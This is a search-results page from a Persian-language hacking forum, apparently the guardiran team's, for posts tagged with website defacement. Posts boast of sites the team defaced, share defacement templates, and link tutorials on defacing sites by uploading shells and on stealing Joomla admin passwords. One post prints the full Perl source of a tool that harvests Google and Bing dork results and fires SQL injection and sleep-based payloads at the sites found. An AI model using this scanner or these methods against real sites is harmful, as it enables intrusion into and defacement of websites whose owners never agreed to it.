جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'دیفیس سایت'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


گروه محصول

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالارهای گفتگو

  • اخبار و اعلانات انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • بخش مسابقات انجمن
    • انتقادات و پیشنهادات
    • افتخارات و اطلاعیه های تیم گارد ایران
    • بخش ارتقاء کاربران
    • اخبار هک و امنیت
    • اکسپلویت های ثبت شده توسط تیم امنیتی گارد ایران
    • برنامه ها و ابزارهای نوشته توسط گارد ایران
  • بخش های خصوصی انجمن گاردایران
    • سوال و جواب های عمومی
    • بخش خصوصی
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • بخش کرک و رمزنگاری
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Mikrotik
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

9 نتیجه پیدا شد

  1. در این تاپیک تمامیه لینک اثبات سایتهای دیفیس شده توسط تیم امنیتی گارد ایران که در سایتهای ثبت دیفیس بغیر از Zone-h.org هستند قرار خواهد گرفت و این سایتها شامل : http://www.zone-hc.com و http://aljyyosh.org موفق باشین
  2. DeMoN

    سلام عزیزان گارد ایران.این تاپیک رو زدم تا دوستان گارد ایران بیان و قالب های دیفیس خودشون رو در اینجا قرار بدن.لازم به ذکره که این قالبها قالب اختصاصی تیم نیستن و شما میتونین در لینک زیر قالب اصلی گروه امنیتی گارد ایران رو دریافت کنید. http://guardiran.org/forums/index.php?/topic/964-دیفیس-جدید-برای-تیم-بزرگ-گارد-ایران/ تشکر از همه دوستان.فقط لطف کنین تاپیک رو نزارین بخوابه. تشکر
  3. در این اموزش: دیفیس سایت با اپلود شل رو اموزش میدم تارگت همون dvwa هست که داخل یه هاست اپلود کردم و شما هم میتونین ازش استفاده کنین mr-bl4ck.byethost32.com هر کاری کردین بعدش درستش کنین تو رو خدا اگر هم دیدین کار میکنه بهم بگین تا برم درستش کنم کپچا هم براش گرفتم و الان قسمتش کار میکنه در ضمن قسمت باگ csrf به درستی کار میکنه اما پسورد رو عوض نمیکنه (خودم تغییرش دادم:) اگر خواستین استفاده کنین و یوزر و پس خواست: user: guardiran pass: guardiran امیدوارم از اموزش لذت ببرین Screencast_09-03-2017_05:53:32_AM.mp4
  4. سلام دوستان مثلا سایتی هست که دیفیس بشه ولی به دیتابیس اطلاعات سایت نتونیم نفوذ کنیم فقط دیفیسش کنیم چجوریه سایتش هم دامنه بداره وبلاگ نباشه مثلا؟
  5. the-king

    با سلام با آموزش هک سایت ج.ملا در خدمتتون هستم با این روش میشه یوزر و پس ادمین ( هک پسورد ) و سایر کاربران رو بدست آورد . توجه توجه : با این روش میشه سایت خارجی زد اما متاسفانه سایت های ایرانی نیز دارای این باگ هستند پس من به شما توصیه میکنم از این روش برای بدست آوردن پسورد سایت های ایرانی استفاده نکنید پس این روش بسیار مهمه و یاد بگیرین کلی سایت دیفیس می کنید joomla hacking.rar
  6. kali

    سلام حدمت تمامی دوستان اینم اسکریپ به زبان پرل کارش چیه ؟ دورک Sql injention سرچ میکنه و سایتهای باگدار و آسیب پذیر رو براحتی بهتون نشون میده. از سایتی مثل Google Dork Bing Dork سرچ میزنه طرز استفاده sqliDorking.pl -d inurl:product.php?id= -p 3اسکریپ#!/usr/bin/perl################################## SQLi Dorking ## Autor: Crozz Cyborg ## ## Copyright 2014 Crozz Cyborg ##################################use strict;$| = 1;$SIG{'INT'} = \&Interrupt;# Modulos/Libreriasuse HTTP::Request;use LWP::UserAgent;use Getopt::Long;use Benchmark;use POSIX;use threads;use Time::HiRes "usleep";# Variablesmy @UserAgents = ('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0','Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0','Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)','Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14','Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14');my ($Dork,$BingDork,$List,$NumPaginas,$FileLinks,$Proxy);my ($proceso,@ProTime);my $result = GetOptions( 'gd=s' => \$Dork, 'bd=s' => \$BingDork, 'l=s' => \$List, 'p=s' => \$NumPaginas, 'f=s' => \$FileLinks, 'prx=s' => \$Proxy);# INI Funcionessub Uso(){ die <<EOTXT;\rUso: $0 [-d dork] -p <paginas> [-l archivo.txt] [-f archivo] -gd <Dork> Google Dork -bd <Bing> Bing Dork -l <Archivo> Archivo con links para analizar -p <paginas> Numero de paginas para buscar -f <archivo> Archivo donde se guardaran los logsEjemplo: $0 -d inurl:product.php?id= -p 3Mas informacion escribe: perldoc $0EOTXT}sub LinksByDork(){ my @Links; my $Paginas = $Dork ? 0 : 1; my ($carga,$porcentaje) = ("",0); $proceso = 'dork'; print "Dork: $Dork$BingDork\n"; foreach(my $pag = 0;$pag <= $NumPaginas;$pag++){ my ($HTML,$Link,@Data); printf("\r[%-50s] %3i%%",$carga,$porcentaje < 100 ? ceil($porcentaje) : floor($porcentaje)); $porcentaje += (100/$NumPaginas); $carga = "=" x ($porcentaje < 100 ? ceil($porcentaje)/2 : floor($porcentaje)/2); my $time1 = new Benchmark; if($Dork){ $HTML = &Navegar('http://www.google.com/search?q='.$Dork.'&start='.$Paginas,$Proxy); } elsif($BingDork){ $HTML = &Navegar('http://www.bing.com/search?q='.$BingDork.'&first='.$Paginas,$Proxy); } my $time2 = new Benchmark; push(@ProTime,${timediff($time2,$time1)}[0]); if($HTML =~ m/Our systems have detected unusual traffic from your computer/i){ $HTML =~ /IP address\: (\S+)\<br/i; print "\rDetectado trafico \"inusual\" de la IP $1\ncambiala para continuar [(C)ambiar a Bing/(Q)uitar/Continuar[Enter]] "; chomp(my $CQ = <STDIN>); if($CQ =~ /q/i){ if($#Links > 0){ @Links = &EliminarRep(@Links); return @Links }else{exit} } elsif($CQ =~ /c/i){ $BingDork = $Dork; $Dork = 0; $Paginas += 1; $HTML = &Navegar('http://www.bing.com/search?q='.$BingDork.'&first='.$Paginas,$Proxy); } else{ print "Continuando...\n"; $pag--; next } } if($Dork){ @Data = $HTML =~ m/href="\/url\?q=([-.:%?=&\/\w]+)\&sa=U&/gi; } elsif($BingDork){ @Data = $HTML =~ /<h3><a href="([-.:%?=&\/\w]+)"/mgi; } foreach $Link(@Data){ if($Link !~ m/google.com/i && $Link !~ m/googleusercontent.com/i && $Link !~ m/msn.com/i && ($Link =~ m/\%3[fF]\w+%3[dD]\w+/ || $Link =~ /\?\w+=\w+/)){ $Link =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $Link =~ s/https:\/\//http:\/\//g; push(@Links,$Link); } } $Paginas += 10; } print "\n\n"; @Links = &EliminarRep(@Links); return @Links}sub LinksByList(){ my @Links; $NumPaginas = 15; open(LIST,"$List"); while(<LIST>){ chomp; $BingDork = "site:$_"; push(@Links,LinksByDork()); } close(LIST); return @Links}sub Navegar(){ my ($URL,$UseProxy) = @_; my ($UA,$Req,$Resp,$Contenido); $UA = LWP::UserAgent->new; $UA->agent($UserAgents[int(rand($#UserAgents+1))]); $UA->timeout(10); $URL =~ /^http\:\/\/([\w\.]+)\/*/; $UA->default_header('Host' => $1); $UA->default_header('Accept' => 'text/html'); $UA->default_header('Accept-Language' => 'en-US,en;q=0.5'); $UA->default_header('DNT' => '1'); $UA->default_header('Connection' => 'close'); $UA->proxy('http' => "http://$UseProxy") if $UseProxy; $Req = HTTP::Request->new(GET => $URL); $Resp = $UA->request($Req); return 0 unless($Resp->is_success); $Contenido = $Resp->content(); return $Contenido}sub SQL(){ my $Link = shift; my @Edit = split('\?',$Link); # Separa variables de la url my @Variables = split('&',$Edit[1]); # Separa por pares variable=valor my %Vars = map {split('=',$_)} @Variables; # Almacena variable = valor en el hash %Vars my $LinkMod; my @HTML = (undef) x 3; foreach my $Var(keys %Vars){ $LinkMod = &ModLink($Edit[0],@Variables,$Var," '"); # Se modifica el link para inyectar el codigo ' en la variable $Var my $time1 = new Benchmark; unless($HTML[0] = &Navegar($LinkMod)){ return 0; } my $time2 = new Benchmark; my $time3 = ${timediff($time2,$time1)}[0]; #push(@ProTime,${timediff($time2,$time1)}[0]); if($HTML[0] =~ m/You have an error in your SQL syntax/i){ my @Ret = ($Link,$Var,"'",$ProTime[$#ProTime]); return \@Ret; } elsif($HTML[0] =~ m/supplied argument is not a valid MySQL/i){ my @Ret = ($Link,$Var,"'",$ProTime[$#ProTime]); return \@Ret; } my ($tmp,$aumento); $tmp += $_ foreach(@ProTime); $tmp = int($tmp/($#ProTime+1)); $aumento = $time3 >= ($tmp+3) ? 10 : 5; foreach(("' and sleep(".($time3+$aumento).") and '1' = '1"," and sleep(".($time3+$aumento).") and 1 = 1")){ $LinkMod = &ModLink($Edit[0],@Variables,$Var,$_); my $time1 = new Benchmark; unless($HTML[0] = &Navegar($LinkMod)){ next; } my $time2 = new Benchmark; my $timedif = timediff($time2,$time1); if($$timedif[0] >= ($time3+$aumento)){ my @Ret = ($Link,$Var,$_,$$timedif[0]); return \@Ret; } } } return 0}sub ModLink(){ my $Host = shift; my @Variables = shift; my $Var = shift; my $Code = shift; my %Vars = map {split('=',$_)} @Variables; my $LinkMod = $Host.'?'; foreach (keys %Vars){ if($Var eq $_){$LinkMod .= "$_=".$Vars{$_}." $Code&";} else{$LinkMod .= "$_=".$Vars{$_}."&";} } chop($LinkMod); return $LinkMod;}sub EliminarRep(){ my @Links = @_; my @HP1; my @HP2; for(my $i = 0;$i <= $#Links;$i++){ @HP1 = split('\?',$Links[$i]); for(my $x = $i;$x <= $#Links;$x++){ @HP2 = split('\?',$Links[$x]); if($i != $x && $HP1[0] eq $HP2[0]){ splice(@Links,$x,1); $x-- if $x != 0; } } } return @Links;}sub Logs(){ if(open(LOGS,">>${$_[0]}")){ print LOGS "$_[1]\n"; close(LOGS); } else{ print "No se puede escribir en el archivo '${$_[0]}' $!"; print "Especifica otro archivo: "; chomp(${$_[0]} = <STDIN>); }}sub Interrupt(){ print "\n\n1) Cambiar proxy\n2) Cambiar dork\n3) Salir\n\n\$> "; chomp(my $resp = <STDIN>); if($resp == 1){print "Nuevo proxy: ";chomp($Proxy = <STDIN>)} elsif($resp == 2){print "Nueva dork: ";chomp($Dork = <STDIN>)} elsif($resp == 3){print "Finalizando\n";exit} else{print "Opcion invalida\n";}}# End Funcionessub main(){ my @Links; my @LinkSQLi; my @t = (4,8,10); my @c = ("\e[1;32m","\e[0;32m"); my $nc = 0; print "Obteniendo links..."; if($Dork){ Uso() unless $NumPaginas; if($BingDork){ print "\rSolamente puedes usar un buscador!\n"; Uso(); } print "\n";push(@Links,LinksByDork()); } elsif($BingDork){ Uso() unless $NumPaginas; if($Dork){ print "\rSolamente puedes usar un buscador!\n"; Uso(); } print "\n";push(@Links,LinksByDork()); } elsif($List){ print "\n";push(@Links,LinksByList()); } else{ Uso(); } print "Escaneando ".($#Links+1)." links...\n\n" if $#Links > 0; foreach(@Links){ my $thr1 = threads->create(\&SQL,$_); while($thr1->is_running()){ for(("/","-","\\","|")){ print $_; usleep(80_000); print "\b"; } } my $Datos = $thr1->join(); if($Datos){ foreach(0..2){ $t[$_] = length($$Datos[$_]) if($t[$_] < length($$Datos[$_])); } printf("Link: %s Var: %s Payload: %s Time: %s\n",$$Datos[0],$$Datos[1],$$Datos[2],$$Datos[3]); &Logs(\$FileLinks,"Link: $$Datos[0] Var: $$Datos[1] Payload: $$Datos[2]") if $FileLinks; push(@LinkSQLi,$Datos); } } if(@LinkSQLi and $^O eq "linux"){ printf("\n" x 5); printf("+%s+%s+%s+\n","-" x ($t[0]),"-" x ($t[1]),"-" x ($t[2])); printf("|\e[0;33mLink%s\e[0m|\e[0;33mVar%s\e[0m|\e[0;33mPayload%s\e[0m|\n"," " x ($t[0]-4)," " x ($t[1]-3)," " x ($t[2]-7)); printf("+%s+%s+%s+\n","-" x ($t[0]),"-" x ($t[1]),"-" x ($t[2])); foreach my $l(@LinkSQLi){ printf("|$c[$nc % 2]%-${t[0]}s\e[0m|$c[$nc % 2]%-${t[1]}s\e[0m|$c[$nc % 2]%-${t[2]}s\e[0m|\n",$$l[0],$$l[1],$$l[2]); $nc++; } printf("+%s+%s+%s+\n","-" x ($t[0]),"-" x ($t[1]),"-" x ($t[2])); system("notify-send \"SQLi Dorking\" \"Escaneo finalizado con ".($#LinkSQLi+1)." vulnerables\" -t 10000"); } elsif(@LinkSQLi and $^O eq "MSWin32"){ printf("\n" x 5); printf("+%s+\n","-" x ($t[0])); printf("|Link%s|\n"," " x ($t[0]-4)); printf("+%s+\n","-" x ($t[0])); foreach my $l(@LinkSQLi){ printf("|%-${t[0]}s|\n",$$l[0]); } printf("+%s+\n","-" x ($t[0])); } else{ print "No se encontraron paginas vulnerables\n"; system("msgbox * \"Escaneo finalizado con ".($#LinkSQLi+1)." vulnerables\""); }}main();__END__=head1 NombreSQLi Dorking=head1 VersionVersion: 1.1 Beta=head1 AutorCrozz Cyborg=head1 DescripcionBusca paginas vulnerables a SQL (usa google)=head1 UsosqliDorking.pl [-d/-bd <dork>] -p <paginas> [-l Links.txt] [-f Logs.txt]=head2 Opciones -gd <Dork> Google Dork -bd <Bing> Bing Dork -l <Archivo> Archivo con links para analizar -p <paginas> Numero de paginas para buscar -f <archivo> Archivo donde se guardaran los logs=head2 Ejemplos de usosqliDorking.pl -gd inurl:product.php?id= -p 3 -f VulneSQL.txtsqliDorking.pl -l links.txt -f VulneSQL.txtsqliDorking.pl -bd inurl:product.php?id= -p 3sqliDorking.pl -l links.txt=head2 Archivo Links.txtEl archivo links.txt puede tener cualquier otro nombre, en cuanto al formato debe de tener 1 nombre de dominio por linea, ejemplo de dominio: victima.com
  7. با سلام و درود این تاپیک با هماهنگی مدیریت سایت P0!s0nC0d3 ایجاد شده است و امیدواریم آموزش خوبی را ارائه دهیم آموزش ها از پایه شروع میشود به مراحل پیشرفته هم خواهد رسید پس دوستان با اندکی صبر حوصله ما را خوشحال کنند. قوانین تاپیک به شرح زیر است : 1-ارسال هرگونه پست اسپم کاملا ممنوع 2-هرگونه نظرات و انتقادات به صورت پیغام خصوصی ارسال شوند 3- از دوستان خواهش میشود هرگونه کمک و راهنمایی دارند به من اطلاع دهند تا تاپیک پربار تر شود 4-برای هرگونه تشکر فقط دکمه تشکر را بزنید و پست ندهید برای شروع یک فایل pdf آماده شده است (اگر غلط املایی بود یا هرنوع اشتباه دیگری به بزرگی خود ببخشید) باتشکر از تمامی دوستان estelahat.pdf
  8. BlackErroR

    بسم الله الرحمن الرحیم باسلام در این فیلم اموزشی باگ JSP را یاد میگیرید که میتونید در یک سرور ویندوزی یک شل با پسوند JSP آپلود کنید و سایت را به راحتی دیفیس کنید. سوالی داشتین درخدمتم. حجم : 1.67 زمان : 3:45 دقیقه فیلم و فایل پیوست شد . موفق باشید . بدرود jsp.rar
  9. دوستان با استفاده‌ از این اسكریپت php میتوانید باگی كه‌ به‌ تازگی كشف شده‌ در ورد پرس با دادن ip سرور اسكن كنید اگر دنبال هک سایت با باگ جدید revscan.zip